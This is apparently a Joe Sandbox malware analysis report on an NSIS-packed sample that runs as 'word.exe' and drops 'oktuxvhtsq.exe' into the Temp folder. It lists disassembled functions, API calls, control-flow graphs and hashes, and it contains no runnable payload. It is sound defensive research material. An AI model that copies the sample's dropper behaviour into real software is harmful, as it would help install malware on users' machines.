                                  • GetTickCount.KERNEL32(0040B0E0,00004000), ref: 00402F6D
                                  • MulDiv.KERNEL32 ref: 00402F9A
                                  • wsprintfA.USER32 ref: 00402FAA
                                  • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CountTick$FileWritewsprintf
                                  • String ID: ... %d%%
                                  • API String ID: 4209647438-2449383134
                                  • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                  • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                  • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                  • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401751 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 507 401751-401774 call 402a29 call 4056f8 512 401776-40177c call 405b98 507->512 513 40177e-401790 call 405b98 call 40568b lstrcatA 507->513 518 401795-40179b call 405dfa 512->518 513->518 523 4017a0-4017a4 518->523 524 4017a6-4017b0 call 405e93 523->524 525 4017d7-4017da 523->525 533 4017c2-4017d4 524->533 534 4017b2-4017c0 CompareFileTime 524->534 526 4017e2-4017fe call 40586f 525->526 527 4017dc-4017dd call 405850 525->527 535 401800-401803 526->535 536 401876-40189f call 404e84 call 402e8e 526->536 527->526 533->525 534->533 537 401805-401847 call 405b98 * 2 call 405bba call 405b98 call 405459 535->537 538 401858-401862 call 404e84 535->538 550 4018a1-4018a5 536->550 551 4018a7-4018b3 SetFileTime 536->551 537->523 570 40184d-40184e 537->570 548 40186b-401871 538->548 553 4028c7 548->553 550->551 552 4018b9-4018c4 CloseHandle 550->552 551->552 555 4018ca-4018cd 552->555 556 4028be-4028c1 552->556 558 4028c9-4028cd 553->558 559 4018e2-4018e5 call 405bba 555->559 560 4018cf-4018e0 call 405bba lstrcatA 555->560 556->553 566 4018ea-402246 call 405459 559->566 560->566 566->556 566->558 570->548 572 401850-401851 570->572 572->538
                                  APIs
                                  • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000000,00000000,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,mrodzekle Setup,NSIS Error), ref: 00405BA5
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                    • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                    • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" $C:\Users\user\AppData\Local\Temp
                                  • API String ID: 1941528284-3798901881
                                  • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                  • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                  • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                  • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405346 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 574 405346-405391 CreateDirectoryA 575 405393-405395 574->575 576 405397-4053a4 GetLastError 574->576 578 4053be-4053c0 575->578 577 4053a6-4053ba SetFileSecurityA 576->577 576->578 577->575 579 4053bc GetLastError 577->579 579->578
                                  APIs
                                  • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                  • GetLastError.KERNEL32 ref: 0040539D
                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                  • GetLastError.KERNEL32 ref: 004053BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                  • String ID: C:\Users\user\AppData\Roaming$Ls@$\s@
                                  • API String ID: 3449924974-4232301360
                                  • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                  • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                  • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                  • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405EBA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 580 405eba-405eda GetSystemDirectoryA 581 405edc 580->581 582 405ede-405ee0 580->582 581->582 583 405ef0-405ef2 582->583 584 405ee2-405eea 582->584 585 405ef3-405f25 wsprintfA LoadLibraryExA 583->585 584->583 586 405eec-405eee 584->586 586->585
                                  APIs
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                  • wsprintfA.USER32 ref: 00405F0A
                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%s.dll$UXTHEME$\
                                  • API String ID: 2200240437-4240819195
                                  • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                  • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                  • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                  • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040589E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 587 40589e-4058a8 588 4058a9-4058d3 GetTickCount GetTempFileNameA 587->588 589 4058e2-4058e4 588->589 590 4058d5-4058d7 588->590 592 4058dc-4058df 589->592 590->588 591 4058d9 590->591 591->592
                                  APIs
                                  • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming\word.exe,004030F9,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004058B1
                                  • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$nsa
                                  • API String ID: 1716503409-3536471476
                                  • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                  • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                  • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                  • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 676 4015b3-4015c6 call 402a29 call 40571f 681 4015c8-4015db call 4056b6 676->681 682 40161c-40161f 676->682 689 4015f3-4015f4 call 4053c3 681->689 690 4015dd-4015e0 681->690 684 401621-40163c call 401423 call 405b98 SetCurrentDirectoryA 682->684 685 40164a-40219c call 401423 682->685 697 4028be-4028cd 684->697 701 401642-401645 684->701 685->697 698 4015f9-4015fb 689->698 690->689 694 4015e2-4015e9 call 4053e0 690->694 694->689 706 4015eb-4015ec call 405346 694->706 702 401612-40161a 698->702 703 4015fd-401602 698->703 701->697 702->681 702->682 707 401604-40160d GetFileAttributesA 703->707 708 40160f 703->708 711 4015f1 706->711 707->702 707->708 708->702 711->698
                                  APIs
                                    • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                    • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                  • String ID: C:\Users\user\AppData\Local\Temp
                                  • API String ID: 1892508949-2935972921
                                  • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                  • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                  • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                  • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040576C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 712 40576c-405787 call 405b98 call 40571f 717 405789-40578b 712->717 718 40578d-40579a call 405dfa 712->718 719 4057df-4057e1 717->719 722 4057a6-4057a8 718->722 723 40579c-4057a0 718->723 725 4057be-4057c7 lstrlenA 722->725 723->717 724 4057a2-4057a4 723->724 724->717 724->722 726 4057c9-4057dd call 40568b GetFileAttributesA 725->726 727 4057aa-4057b1 call 405e93 725->727 726->719 732 4057b3-4057b6 727->732 733 4057b8-4057b9 call 4056d2 727->733 732->717 732->733 733->725
                                  APIs
                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,mrodzekle Setup,NSIS Error), ref: 00405BA5
                                    • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                  • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057BF
                                  • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                  • String ID: C:\
                                  • API String ID: 3248276644-3404278061
                                  • Opcode ID: 0c6b5d1daa3c2ede88059e0d3e78c561d31498b229fd294e54aeb43f41febe10
                                  • Instruction ID: 54d673280676c30d7487fb506765264cad7adccc2ba99e33922fd806b78c8ed4
                                  • Opcode Fuzzy Hash: 0c6b5d1daa3c2ede88059e0d3e78c561d31498b229fd294e54aeb43f41febe10
                                  • Instruction Fuzzy Hash: DAF0C829105D509AD222373A5C05ABF2655CE86364F19063BFC55B32D2DB3C8943FD7E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004053F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 735 4053f8-405425 CreateProcessA 736 405433-405434 735->736 737 405427-405430 CloseHandle 735->737 737->736
                                  APIs
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                  • CloseHandle.KERNEL32(?), ref: 0040542A
                                  Strings
                                  • Error launching installer, xrefs: 0040540B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID: Error launching installer
                                  • API String ID: 3712363035-66219284
                                  • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                  • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                  • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                  • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406609 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                  • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                  • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                  • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040680A Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                  • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                  • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                  • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406520 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                  • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                  • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                  • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406025 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                  • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                  • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                  • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406473 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
